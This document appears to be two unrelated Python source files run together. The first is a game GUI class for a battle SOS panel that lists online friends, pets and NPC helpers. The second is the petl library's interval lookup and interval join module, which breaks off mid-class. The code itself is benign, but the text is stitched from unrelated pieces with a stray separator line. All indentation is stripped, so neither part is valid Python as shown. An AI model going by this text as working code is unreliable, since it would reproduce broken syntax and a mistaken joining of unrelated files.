class TownBattleSOSPanel(DirectFrame, StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('TownBattleSOSPanel')
def __init__(self, doneEvent):
DirectFrame.__init__(self, relief=None)
self.initialiseoptions(TownBattleSOSPanel)
StateData.StateData.__init__(self, doneEvent)
self.friends = {}
self.NPCFriends = {}
self.textRolloverColor = Vec4(1, 1, 0, 1)
self.textDownColor = Vec4(0.5, 0.9, 1, 1)
self.textDisabledColor = Vec4(0.4, 0.8, 0.4, 1)
self.bldg = 0
self.chosenNPCToons = []
return
def load(self):
if self.isLoaded == 1:
return None
self.isLoaded = 1
bgd = loader.loadModel('phase_3.5/models/gui/frame')
gui = loader.loadModel('phase_3.5/models/gui/frame4names')
scrollGui = loader.loadModel('phase_3.5/models/gui/friendslist_gui')
backGui = loader.loadModel('phase_3.5/models/gui/battle_gui')
self['image'] = bgd
self['image_pos'] = (0.0, 0.1, -0.08)
self.setScale(0.3)
self.title = DirectLabel(parent=self, relief=None, text=TTLocalizer.TownBattleSOSNoFriends, text_scale=0.4, text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), pos=(0.0, 0.0, 1.5))
self.NPCFriendPanel = NPCFriendPanel.NPCFriendPanel(parent=self, doneEvent=self.doneEvent)
self.NPCFriendPanel.setPos(-0.75, 0, -0.15)
self.NPCFriendPanel.setScale(0.325)
self.NPCFriendsLabel = DirectLabel(parent=self, relief=None, text=TTLocalizer.TownBattleSOSNPCFriends, text_scale=0.3, text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), pos=(-0.75, 0.0, -2.0))
self.scrollList = DirectScrolledList(parent=self, relief=None, image=gui.find('**/frame4names'), image_scale=(0.11, 1, 0.1), text=TTLocalizer.FriendsListPanelOnlineFriends, text_scale=0.04, text_pos=(-0.02, 0.275), text_fg=(0, 0, 0, 1), incButton_image=(scrollGui.find('**/FndsLst_ScrollUp'),
scrollGui.find('**/FndsLst_ScrollDN'),
scrollGui.find('**/FndsLst_ScrollUp_Rllvr'),
scrollGui.find('**/FndsLst_ScrollUp')), incButton_relief=None, incButton_pos=(0.0, 0.0, -0.3), incButton_image3_color=Vec4(0.6, 0.6, 0.6, 0.6), incButton_scale=(1.0, 1.0, -1.0), decButton_image=(scrollGui.find('**/FndsLst_ScrollUp'),
scrollGui.find('**/FndsLst_ScrollDN'),
scrollGui.find('**/FndsLst_ScrollUp_Rllvr'),
scrollGui.find('**/FndsLst_ScrollUp')), decButton_relief=None, decButton_pos=(0.0, 0.0, 0.175), decButton_image3_color=Vec4(0.6, 0.6, 0.6, 0.6), itemFrame_pos=(-0.17, 0.0, 0.11), itemFrame_relief=None, numItemsVisible=9, items=[], pos=(2.4, 0.0, 0.025), scale=3.5)
clipper = PlaneNode('clipper')
clipper.setPlane(Plane(Vec3(-1, 0, 0), Point3(0.32, 0, 0)))
clipNP = self.scrollList.component('itemFrame').attachNewNode(clipper)
self.scrollList.component('itemFrame').setClipPlane(clipNP)
self.close = DirectButton(parent=self, relief=None, image=(backGui.find('**/PckMn_BackBtn'), backGui.find('**/PckMn_BackBtn_Dn'), backGui.find('**/PckMn_BackBtn_Rlvr')), pos=(2.3, 0.0, -1.65), scale=3, text=TTLocalizer.TownBattleSOSBack, text_scale=0.05, text_pos=(0.01, -0.012), text_fg=Vec4(0, 0, 0.8, 1), command=self.__close)
gui.removeNode()
scrollGui.removeNode()
backGui.removeNode()
bgd.removeNode()
self.hide()
return
def unload(self):
if self.isLoaded == 0:
return None
self.isLoaded = 0
self.exit()
del self.title
del self.scrollList
del self.close
del self.friends
del self.NPCFriends
DirectFrame.destroy(self)
return None
def makeFriendButton(self, friendPair):
friendId, flags = friendPair
handle = base.cr.playerFriendsManager.identifyFriend(friendId)
if handle == None:
base.cr.fillUpFriendsMap()
return
friendName = handle.getName()
fg = Vec4(0.0, 0.0, 0.0, 1.0)
if handle.isPet():
com = self.__chosePet
else:
com = self.__choseFriend
return DirectButton(relief=None, text=friendName, text_scale=0.04, text_align=TextNode.ALeft, text_fg=fg, text1_bg=self.textDownColor, text2_bg=self.textRolloverColor, text3_fg=self.textDisabledColor, command=com, extraArgs=[friendId, friendName])
def makeNPCFriendButton(self, NPCFriendId, numCalls):
if NPCFriendId not in TTLocalizer.NPCToonNames:
return None
friendName = TTLocalizer.NPCToonNames[NPCFriendId]
friendName += ' %d' % numCalls
fg = Vec4(0.0, 0.0, 0.0, 1.0)
return DirectButton(relief=None, text=friendName, text_scale=0.04, text_align=TextNode.ALeft, text_fg=fg, text1_bg=self.textDownColor, text2_bg=self.textRolloverColor, text3_fg=self.textDisabledColor, command=self.__choseNPCFriend, extraArgs=[NPCFriendId])
def enter(self, canLure = 1, canTrap = 1):
if self.isEntered == 1:
return None
self.isEntered = 1
if self.isLoaded == 0:
self.load()
self.canLure = canLure
self.canTrap = canTrap
self.factoryToonIdList = None
messenger.send('SOSPanelEnter', [self])
self.__updateScrollList()
self.__updateNPCFriendsPanel()
self.__updateTitleText()
self.show()
self.accept('friendOnline', self.__friendOnline)
self.accept('friendOffline', self.__friendOffline)
self.accept('friendsListChanged', self.__friendsListChanged)
self.accept('friendsMapComplete', self.__friendsListChanged)
return
def exit(self):
if self.isEntered == 0:
return None
self.isEntered = 0
self.hide()
self.ignore('friendOnline')
self.ignore('friendOffline')
self.ignore('friendsListChanged')
self.ignore('friendsMapComplete')
messenger.send(self.doneEvent)
return None
def __close(self):
doneStatus = {}
doneStatus['mode'] = 'Back'
messenger.send(self.doneEvent, [doneStatus])
def __choseFriend(self, friendId, friendName):
doneStatus = {}
doneStatus['mode'] = 'Friend'
doneStatus['friend'] = friendId
messenger.send(self.doneEvent, [doneStatus])
def __chosePet(self, petId, petName):
doneStatus = {}
doneStatus['mode'] = 'Pet'
doneStatus['petId'] = petId
doneStatus['petName'] = petName
messenger.send(self.doneEvent, [doneStatus])
def __choseNPCFriend(self, friendId):
doneStatus = {}
doneStatus['mode'] = 'NPCFriend'
doneStatus['friend'] = friendId
self.chosenNPCToons.append(friendId)
messenger.send(self.doneEvent, [doneStatus])
def setFactoryToonIdList(self, toonIdList):
self.factoryToonIdList = toonIdList[:]
def __updateScrollList(self):
newFriends = []
battlePets = base.config.GetBool('want-pets-in-battle', 1)
if base.wantPets and battlePets == 1 and base.localAvatar.hasPet():
newFriends.append((base.localAvatar.getPetId(), 0))
if not self.bldg or self.factoryToonIdList is not None:
for friendPair in base.localAvatar.friendsList:
if base.cr.isFriendOnline(friendPair[0]):
if self.factoryToonIdList is None or friendPair[0] in self.factoryToonIdList:
newFriends.append(friendPair)
if hasattr(base.cr, 'playerFriendsManager'):
for avatarId in base.cr.playerFriendsManager.getAllOnlinePlayerAvatars():
if not base.cr.playerFriendsManager.askAvatarKnownElseWhere(avatarId):
newFriends.append((avatarId, 0))
for friendPair in self.friends.keys():
if friendPair not in newFriends:
friendButton = self.friends[friendPair]
self.scrollList.removeItem(friendButton)
if not friendButton.isEmpty():
friendButton.destroy()
del self.friends[friendPair]
for friendPair in newFriends:
if friendPair not in self.friends:
friendButton = self.makeFriendButton(friendPair)
if friendButton:
self.scrollList.addItem(friendButton)
self.friends[friendPair] = friendButton
return
def __updateNPCFriendsPanel(self):
self.NPCFriends = {}
for friend, count in base.localAvatar.NPCFriendsDict.items():
track = NPCToons.getNPCTrack(friend)
if track == ToontownBattleGlobals.LURE_TRACK and self.canLure == 0 or track == ToontownBattleGlobals.TRAP_TRACK and self.canTrap == 0:
self.NPCFriends[friend] = 0
else:
self.NPCFriends[friend] = count
self.NPCFriendPanel.update(self.NPCFriends, fCallable=1)
def __updateTitleText(self):
isEmpty = (len(self.friends) == 0 and len(self.NPCFriends) == 0)
if isEmpty:
self.title['text'] = TTLocalizer.TownBattleSOSNoFriends
else:
self.title['text'] = TTLocalizer.TownBattleSOSWhichFriend
def __friendOnline(self, doId, commonChatFlags, whitelistChatFlags):
self.__updateScrollList()
self.__updateTitleText()
def __friendOffline(self, doId):
self.__updateScrollList()
self.__updateTitleText()
def __friendsListChanged(self):
self.__updateScrollList()
self.__updateTitleText()
| |
from __future__ import absolute_import, print_function, division
from operator import itemgetter, attrgetter
from petl.compat import text_type
from petl.util.base import asindices, records, Table, values, rowgroupby
from petl.errors import DuplicateKeyError
from petl.transform.basics import addfield
from petl.transform.sorts import sort
def tupletree(table, start='start', stop='stop', value=None):
"""
Construct an interval tree for the given table, where each node in the tree
is a row of the table.
"""
import intervaltree
tree = intervaltree.IntervalTree()
it = iter(table)
hdr = next(it)
flds = list(map(text_type, hdr))
assert start in flds, 'start field not recognised'
assert stop in flds, 'stop field not recognised'
getstart = itemgetter(flds.index(start))
getstop = itemgetter(flds.index(stop))
if value is None:
getvalue = tuple
else:
valueindices = asindices(hdr, value)
assert len(valueindices) > 0, 'invalid value field specification'
getvalue = itemgetter(*valueindices)
for row in it:
tree.addi(getstart(row), getstop(row), getvalue(row))
return tree
def facettupletrees(table, key, start='start', stop='stop', value=None):
"""
Construct faceted interval trees for the given table, where each node in
the tree is a row of the table.
"""
import intervaltree
it = iter(table)
hdr = next(it)
flds = list(map(text_type, hdr))
assert start in flds, 'start field not recognised'
assert stop in flds, 'stop field not recognised'
getstart = itemgetter(flds.index(start))
getstop = itemgetter(flds.index(stop))
if value is None:
getvalue = tuple
else:
valueindices = asindices(hdr, value)
assert len(valueindices) > 0, 'invalid value field specification'
getvalue = itemgetter(*valueindices)
keyindices = asindices(hdr, key)
assert len(keyindices) > 0, 'invalid key'
getkey = itemgetter(*keyindices)
trees = dict()
for row in it:
k = getkey(row)
if k not in trees:
trees[k] = intervaltree.IntervalTree()
trees[k].addi(getstart(row), getstop(row), getvalue(row))
return trees
def recordtree(table, start='start', stop='stop'):
"""
Construct an interval tree for the given table, where each node in the
tree is a row of the table represented as a record object.
"""
import intervaltree
getstart = attrgetter(start)
getstop = attrgetter(stop)
tree = intervaltree.IntervalTree()
for rec in records(table):
tree.addi(getstart(rec), getstop(rec), rec)
return tree
def facetrecordtrees(table, key, start='start', stop='stop'):
"""
Construct faceted interval trees for the given table, where each node in
the tree is a record.
"""
import intervaltree
getstart = attrgetter(start)
getstop = attrgetter(stop)
getkey = attrgetter(key)
trees = dict()
for rec in records(table):
k = getkey(rec)
if k not in trees:
trees[k] = intervaltree.IntervalTree()
trees[k].addi(getstart(rec), getstop(rec), rec)
return trees
def intervallookup(table, start='start', stop='stop', value=None,
include_stop=False):
"""
Construct an interval lookup for the given table. E.g.::
>>> import petl as etl
>>> table = [['start', 'stop', 'value'],
... [1, 4, 'foo'],
... [3, 7, 'bar'],
... [4, 9, 'baz']]
>>> lkp = etl.intervallookup(table, 'start', 'stop')
>>> lkp.search(0, 1)
[]
>>> lkp.search(1, 2)
[(1, 4, 'foo')]
>>> lkp.search(2, 4)
[(1, 4, 'foo'), (3, 7, 'bar')]
>>> lkp.search(2, 5)
[(1, 4, 'foo'), (3, 7, 'bar'), (4, 9, 'baz')]
>>> lkp.search(9, 14)
[]
>>> lkp.search(19, 140)
[]
>>> lkp.search(0)
[]
>>> lkp.search(1)
[(1, 4, 'foo')]
>>> lkp.search(2)
[(1, 4, 'foo')]
>>> lkp.search(4)
[(3, 7, 'bar'), (4, 9, 'baz')]
>>> lkp.search(5)
[(3, 7, 'bar'), (4, 9, 'baz')]
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
Some examples using the `include_stop` and `value` keyword arguments::
>>> import petl as etl
>>> table = [['start', 'stop', 'value'],
... [1, 4, 'foo'],
... [3, 7, 'bar'],
... [4, 9, 'baz']]
>>> lkp = etl.intervallookup(table, 'start', 'stop', include_stop=True,
... value='value')
>>> lkp.search(0, 1)
['foo']
>>> lkp.search(1, 2)
['foo']
>>> lkp.search(2, 4)
['foo', 'bar', 'baz']
>>> lkp.search(2, 5)
['foo', 'bar', 'baz']
>>> lkp.search(9, 14)
['baz']
>>> lkp.search(19, 140)
[]
>>> lkp.search(0)
[]
>>> lkp.search(1)
['foo']
>>> lkp.search(2)
['foo']
>>> lkp.search(4)
['foo', 'bar', 'baz']
>>> lkp.search(5)
['bar', 'baz']
"""
tree = tupletree(table, start=start, stop=stop, value=value)
return IntervalTreeLookup(tree, include_stop=include_stop)
Table.intervallookup = intervallookup
def _search_tree(tree, start, stop, include_stop):
if stop is None:
if include_stop:
stop = start + 1
start -= 1
args = (start, stop)
else:
args = (start,)
else:
if include_stop:
stop += 1
start -= 1
args = (start, stop)
results = sorted(tree.search(*args))
return results
class IntervalTreeLookup(object):
def __init__(self, tree, include_stop=False):
self.tree = tree
self.include_stop = include_stop
def search(self, start, stop=None):
results = _search_tree(self.tree, start, stop, self.include_stop)
return [r.data for r in results]
find = search
def intervallookupone(table, start='start', stop='stop', value=None,
include_stop=False, strict=True):
"""
Construct an interval lookup for the given table, returning at most one
result for each query. E.g.::
>>> import petl as etl
>>> table = [['start', 'stop', 'value'],
... [1, 4, 'foo'],
... [3, 7, 'bar'],
... [4, 9, 'baz']]
>>> lkp = etl.intervallookupone(table, 'start', 'stop', strict=False)
>>> lkp.search(0, 1)
>>> lkp.search(1, 2)
(1, 4, 'foo')
>>> lkp.search(2, 4)
(1, 4, 'foo')
>>> lkp.search(2, 5)
(1, 4, 'foo')
>>> lkp.search(9, 14)
>>> lkp.search(19, 140)
>>> lkp.search(0)
>>> lkp.search(1)
(1, 4, 'foo')
>>> lkp.search(2)
(1, 4, 'foo')
>>> lkp.search(4)
(3, 7, 'bar')
>>> lkp.search(5)
(3, 7, 'bar')
If ``strict=True``, queries returning more than one result will
raise a `DuplicateKeyError`. If ``strict=False`` and there is
more than one result, the first result is returned.
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
"""
tree = tupletree(table, start=start, stop=stop, value=value)
return IntervalTreeLookupOne(tree, strict=strict, include_stop=include_stop)
Table.intervallookupone = intervallookupone
class IntervalTreeLookupOne(object):
def __init__(self, tree, strict=True, include_stop=False):
self.tree = tree
self.strict = strict
self.include_stop = include_stop
def search(self, start, stop=None):
results = _search_tree(self.tree, start, stop, self.include_stop)
if len(results) == 0:
return None
elif len(results) > 1 and self.strict:
raise DuplicateKeyError((start, stop))
else:
return results[0].data
find = search
def intervalrecordlookup(table, start='start', stop='stop', include_stop=False):
"""
As :func:`petl.transform.intervals.intervallookup` but return records
instead of tuples.
"""
tree = recordtree(table, start=start, stop=stop)
return IntervalTreeLookup(tree, include_stop=include_stop)
Table.intervalrecordlookup = intervalrecordlookup
def intervalrecordlookupone(table, start='start', stop='stop',
include_stop=False, strict=True):
"""
As :func:`petl.transform.intervals.intervallookupone` but return records
instead of tuples.
"""
tree = recordtree(table, start=start, stop=stop)
return IntervalTreeLookupOne(tree, include_stop=include_stop, strict=strict)
Table.intervalrecordlookupone = intervalrecordlookupone
def facetintervallookup(table, key, start='start', stop='stop',
value=None, include_stop=False):
"""
Construct a faceted interval lookup for the given table. E.g.::
>>> import petl as etl
>>> table = (('type', 'start', 'stop', 'value'),
... ('apple', 1, 4, 'foo'),
... ('apple', 3, 7, 'bar'),
... ('orange', 4, 9, 'baz'))
>>> lkp = etl.facetintervallookup(table, key='type', start='start', stop='stop')
>>> lkp['apple'].search(1, 2)
[('apple', 1, 4, 'foo')]
>>> lkp['apple'].search(2, 4)
[('apple', 1, 4, 'foo'), ('apple', 3, 7, 'bar')]
>>> lkp['apple'].search(2, 5)
[('apple', 1, 4, 'foo'), ('apple', 3, 7, 'bar')]
>>> lkp['orange'].search(2, 5)
[('orange', 4, 9, 'baz')]
>>> lkp['orange'].search(9, 14)
[]
>>> lkp['orange'].search(19, 140)
[]
>>> lkp['apple'].search(1)
[('apple', 1, 4, 'foo')]
>>> lkp['apple'].search(2)
[('apple', 1, 4, 'foo')]
>>> lkp['apple'].search(4)
[('apple', 3, 7, 'bar')]
>>> lkp['apple'].search(5)
[('apple', 3, 7, 'bar')]
>>> lkp['orange'].search(5)
[('orange', 4, 9, 'baz')]
"""
trees = facettupletrees(table, key, start=start, stop=stop, value=value)
out = dict()
for k in trees:
out[k] = IntervalTreeLookup(trees[k], include_stop=include_stop)
return out
Table.facetintervallookup = facetintervallookup
def facetintervallookupone(table, key, start='start', stop='stop',
value=None, include_stop=False, strict=True):
"""
Construct a faceted interval lookup for the given table, returning at most
one result for each query.
If ``strict=True``, queries returning more than one result will
raise a `DuplicateKeyError`. If ``strict=False`` and there is
more than one result, the first result is returned.
"""
trees = facettupletrees(table, key, start=start, stop=stop, value=value)
out = dict()
for k in trees:
out[k] = IntervalTreeLookupOne(trees[k], include_stop=include_stop,
strict=strict)
return out
Table.facetintervallookupone = facetintervallookupone
def facetintervalrecordlookup(table, key, start='start', stop='stop',
include_stop=False):
"""
As :func:`petl.transform.intervals.facetintervallookup` but return records.
"""
trees = facetrecordtrees(table, key, start=start, stop=stop)
out = dict()
for k in trees:
out[k] = IntervalTreeLookup(trees[k], include_stop=include_stop)
return out
Table.facetintervalrecordlookup = facetintervalrecordlookup
def facetintervalrecordlookupone(table, key, start, stop, include_stop=False,
strict=True):
"""
As :func:`petl.transform.intervals.facetintervallookupone` but return
records.
"""
trees = facetrecordtrees(table, key, start=start, stop=stop)
out = dict()
for k in trees:
out[k] = IntervalTreeLookupOne(trees[k], include_stop=include_stop,
strict=strict)
return out
Table.facetintervalrecordlookupone = facetintervalrecordlookupone
def intervaljoin(left, right, lstart='start', lstop='stop', rstart='start',
rstop='stop', lkey=None, rkey=None, include_stop=False,
lprefix=None, rprefix=None):
"""
Join two tables by overlapping intervals. E.g.::
>>> import petl as etl
>>> left = [['begin', 'end', 'quux'],
... [1, 2, 'a'],
... [2, 4, 'b'],
... [2, 5, 'c'],
... [9, 14, 'd'],
... [1, 1, 'e'],
... [10, 10, 'f']]
>>> right = [['start', 'stop', 'value'],
... [1, 4, 'foo'],
... [3, 7, 'bar'],
... [4, 9, 'baz']]
>>> table1 = etl.intervaljoin(left, right,
... lstart='begin', lstop='end',
... rstart='start', rstop='stop')
>>> table1.lookall()
+-------+-----+------+-------+------+-------+
| begin | end | quux | start | stop | value |
+=======+=====+======+=======+======+=======+
| 1 | 2 | 'a' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 4 | 9 | 'baz' |
+-------+-----+------+-------+------+-------+
>>> # include stop coordinate in intervals
... table2 = etl.intervaljoin(left, right,
... lstart='begin', lstop='end',
... rstart='start', rstop='stop',
... include_stop=True)
>>> table2.lookall()
+-------+-----+------+-------+------+-------+
| begin | end | quux | start | stop | value |
+=======+=====+======+=======+======+=======+
| 1 | 2 | 'a' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 4 | 9 | 'baz' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 4 | 9 | 'baz' |
+-------+-----+------+-------+------+-------+
| 9 | 14 | 'd' | 4 | 9 | 'baz' |
+-------+-----+------+-------+------+-------+
| 1 | 1 | 'e' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
An additional key comparison can be made, e.g.::
>>> import petl as etl
>>> left = (('fruit', 'begin', 'end'),
... ('apple', 1, 2),
... ('apple', 2, 4),
... ('apple', 2, 5),
... ('orange', 2, 5),
... ('orange', 9, 14),
... ('orange', 19, 140),
... ('apple', 1, 1))
>>> right = (('type', 'start', 'stop', 'value'),
... ('apple', 1, 4, 'foo'),
... ('apple', 3, 7, 'bar'),
... ('orange', 4, 9, 'baz'))
>>> table3 = etl.intervaljoin(left, right,
... lstart='begin', lstop='end', lkey='fruit',
... rstart='start', rstop='stop', rkey='type')
>>> table3.lookall()
+----------+-------+-----+----------+-------+------+-------+
| fruit | begin | end | type | start | stop | value |
+==========+=======+=====+==========+=======+======+=======+
| 'apple' | 1 | 2 | 'apple' | 1 | 4 | 'foo' |
+----------+-------+-----+----------+-------+------+-------+
| 'apple' | 2 | 4 | 'apple' | 1 | 4 | 'foo' |
+----------+-------+-----+----------+-------+------+-------+
| 'apple' | 2 | 4 | 'apple' | 3 | 7 | 'bar' |
+----------+-------+-----+----------+-------+------+-------+
| 'apple' | 2 | 5 | 'apple' | 1 | 4 | 'foo' |
+----------+-------+-----+----------+-------+------+-------+
| 'apple' | 2 | 5 | 'apple' | 3 | 7 | 'bar' |
+----------+-------+-----+----------+-------+------+-------+
| 'orange' | 2 | 5 | 'orange' | 4 | 9 | 'baz' |
+----------+-------+-----+----------+-------+------+-------+
"""
assert (lkey is None) == (rkey is None), \
'facet key field must be provided for both or neither table'
return IntervalJoinView(left, right, lstart=lstart, lstop=lstop,
rstart=rstart, rstop=rstop, lkey=lkey,
rkey=rkey, include_stop=include_stop,
lprefix=lprefix, rprefix=rprefix)
Table.intervaljoin = intervaljoin
class IntervalJoinView(Table):
def __init__(self, left, right, lstart='start', lstop='stop',
rstart='start', rstop='stop', lkey=None, rkey=None,
include_stop=False, lprefix=None, rprefix=None):
self.left = left
self.lstart = lstart
self.lstop = lstop
self.lkey = lkey
self.right = right
self.rstart = rstart
self.rstop = rstop
self.rkey = rkey
self.include_stop = include_stop
self.lprefix = lprefix
self.rprefix = rprefix
def __iter__(self):
return iterintervaljoin(
left=self.left,
right=self.right,
lstart=self.lstart,
lstop=self.lstop,
rstart=self.rstart,
rstop=self.rstop,
lkey=self.lkey,
rkey=self.rkey,
include_stop=self.include_stop,
missing=None,
lprefix=self.lprefix,
rprefix=self.rprefix,
leftouter=False
)
def intervalleftjoin(left, right, lstart='start', lstop='stop', rstart='start',
rstop='stop', lkey=None, rkey=None, include_stop=False,
missing=None, lprefix=None, rprefix=None):
"""
Like :func:`petl.transform.intervals.intervaljoin` but rows from the left
table without a match in the right table are also included. E.g.::
>>> import petl as etl
>>> left = [['begin', 'end', 'quux'],
... [1, 2, 'a'],
... [2, 4, 'b'],
... [2, 5, 'c'],
... [9, 14, 'd'],
... [1, 1, 'e'],
... [10, 10, 'f']]
>>> right = [['start', 'stop', 'value'],
... [1, 4, 'foo'],
... [3, 7, 'bar'],
... [4, 9, 'baz']]
>>> table1 = etl.intervalleftjoin(left, right,
... lstart='begin', lstop='end',
... rstart='start', rstop='stop')
>>> table1.lookall()
+-------+-----+------+-------+------+-------+
| begin | end | quux | start | stop | value |
+=======+=====+======+=======+======+=======+
| 1 | 2 | 'a' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 4 | 'b' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 1 | 4 | 'foo' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 3 | 7 | 'bar' |
+-------+-----+------+-------+------+-------+
| 2 | 5 | 'c' | 4 | 9 | 'baz' |
+-------+-----+------+-------+------+-------+
| 9 | 14 | 'd' | None | None | None |
+-------+-----+------+-------+------+-------+
| 1 | 1 | 'e' | None | None | None |
+-------+-----+------+-------+------+-------+
| 10 | 10 | 'f' | None | None | None |
+-------+-----+------+-------+------+-------+
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
"""
assert (lkey is None) == (rkey is None), \
'facet key field must be provided for both or neither table'
return IntervalLeftJoinView(left, right, lstart=lstart, lstop=lstop,
rstart=rstart, rstop=rstop, lkey=lkey,
rkey=rkey, include_stop=include_stop,
missing=missing, lprefix=lprefix,
rprefix=rprefix)
Table.intervalleftjoin = intervalleftjoin
class IntervalLeftJoinView(Table):
def __init__(self, left, right, lstart='start', lstop='stop',
rstart='start', rstop='stop', lkey=None, rkey=None,
missing=None, include_stop=False, lprefix=None, rprefix=None):
self.left = left
self.lstart = lstart
self.lstop = lstop
self.lkey = lkey
self.right = right
self.rstart = rstart
self.rstop = rstop
self.rkey = rkey
self.missing = missing
self.include_stop = include_stop
self.lprefix = lprefix
self.rprefix = rprefix
def __iter__(self):
return iterintervaljoin(
left=self.left,
right=self.right,
lstart=self.lstart,
lstop=self.lstop,
rstart=self.rstart,
rstop=self.rstop,
lkey=self.lkey,
rkey=self.rkey,
include_stop=self.include_stop,
missing=self.missing,
lprefix=self.lprefix,
rprefix=self.rprefix,
leftouter=True
)
def intervalantijoin(left, right, lstart='start', lstop='stop', rstart='start',
rstop='stop', lkey=None, rkey=None, include_stop=False,
missing=None):
"""
Return rows from the `left` table with no overlapping rows from the `right`
table.
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
"""
assert (lkey is None) == (rkey is None), \
'facet key field must be provided for both or neither table'
return IntervalAntiJoinView(left, right, lstart=lstart, lstop=lstop,
rstart=rstart, rstop=rstop, lkey=lkey,
rkey=rkey, include_stop=include_stop,
missing=missing)
Table.intervalantijoin = intervalantijoin
class IntervalAntiJoinView(Table):
def __init__(self, left, right, lstart='start', lstop='stop',
rstart='start', rstop='stop', lkey=None, rkey=None,
missing=None, include_stop=False):
self.left = left
self.lstart = lstart
self.lstop = lstop
self.lkey = lkey
self.right = right
self.rstart = rstart
self.rstop = rstop
self.rkey = rkey
self.missing = missing
self.include_stop = include_stop
def __iter__(self):
return iterintervaljoin(
left=self.left,
right=self.right,
lstart=self.lstart,
lstop=self.lstop,
rstart=self.rstart,
rstop=self.rstop,
lkey=self.lkey,
rkey=self.rkey,
include_stop=self.include_stop,
missing=self.missing,
lprefix=None,
rprefix=None,
leftouter=True,
anti=True
)
def iterintervaljoin(left, right, lstart, lstop, rstart, rstop, lkey,
rkey, include_stop, missing, lprefix, rprefix, leftouter,
anti=False):
# create iterators and obtain fields
lit = iter(left)
lhdr = next(lit)
lflds = list(map(text_type, lhdr))
rit = iter(right)
rhdr = next(rit)
rflds = list(map(text_type, rhdr))
# check fields via petl.util.asindices (raises FieldSelectionError if spec
# is not valid)
asindices(lhdr, lstart)
asindices(lhdr, lstop)
if lkey is not None:
asindices(lhdr, lkey)
asindices(rhdr, rstart)
asindices(rhdr, rstop)
if rkey is not None:
asindices(rhdr, rkey)
# determine output fields
if lprefix is None:
outhdr = list(lflds)
if not anti:
outhdr.extend(rflds)
else:
outhdr = list(lprefix + f for f in lflds)
if not anti:
outhdr.extend(rprefix + f for f in rflds)
yield tuple(outhdr)
# create getters for start and stop positions
getlstart = itemgetter(lflds.index(lstart))
getlstop = itemgetter(lflds.index(lstop))
if rkey is None:
# build interval lookup for right table
lookup = intervallookup(right, rstart, rstop, include_stop=include_stop)
search = lookup.search
# main loop
for lrow in lit:
start = getlstart(lrow)
stop = getlstop(lrow)
rrows = search(start, stop)
if rrows:
if not anti:
for rrow in rrows:
outrow = list(lrow)
outrow.extend(rrow)
yield tuple(outrow)
elif leftouter:
outrow = list(lrow)
if not anti:
outrow.extend([missing] * len(rflds))
yield tuple(outrow)
else:
# build interval lookup for right table
lookup = facetintervallookup(right, key=rkey, start=rstart,
stop=rstop, include_stop=include_stop)
search = dict()
for f in lookup:
search[f] = lookup[f].search
# getter for facet key values in left table
getlkey = itemgetter(*asindices(lflds, lkey))
# main loop
for lrow in lit:
lkey = getlkey(lrow)
start = getlstart(lrow)
stop = getlstop(lrow)
try:
rrows = search[lkey](start, stop)
except KeyError:
rrows = None
except AttributeError:
rrows = None
if rrows:
if not anti:
for rrow in rrows:
outrow = list(lrow)
outrow.extend(rrow)
yield tuple(outrow)
elif leftouter:
outrow = list(lrow)
if not anti:
outrow.extend([missing] * len(rflds))
yield tuple(outrow)
def intervaljoinvalues(left, right, value, lstart='start', lstop='stop',
rstart='start', rstop='stop', lkey=None, rkey=None,
include_stop=False):
"""
Convenience function to join the left table with values from a specific
field in the right hand table.
Note start coordinates are included and stop coordinates are excluded
from the interval. Use the `include_stop` keyword argument to include the
upper bound of the interval when finding overlaps.
"""
assert (lkey is None) == (rkey is None), \
'facet key field must be provided for both or neither table'
if lkey is None:
lkp = intervallookup(right, start=rstart, stop=rstop, value=value,
include_stop=include_stop)
f = lambda row: lkp.search(row[lstart], row[lstop])
else:
lkp = facetintervallookup(right, rkey, start=rstart, stop=rstop,
value=value, include_stop=include_stop)
f = lambda row: lkp[row[lkey]].search(row[lstart], row[lstop])
return addfield(left, value, f)
Table.intervaljoinvalues = intervaljoinvalues
def intervalsubtract(left, right, lstart='start', lstop='stop', rstart='start',
rstop='stop', lkey=None, rkey=None, include_stop=False):
"""
Subtract intervals in the right hand table from intervals in the left hand
table.
"""
assert (lkey is None) == (rkey is None), \
'facet key field must be provided for both or neither table'
return IntervalSubtractView(left, right, lstart=lstart, lstop=lstop,
rstart=rstart, rstop=rstop, lkey=lkey,
rkey=rkey, include_stop=include_stop)
Table.intervalsubtract = intervalsubtract
class IntervalSubtractView(Table):
def __init__(self, left, right, lstart='start', lstop='stop',
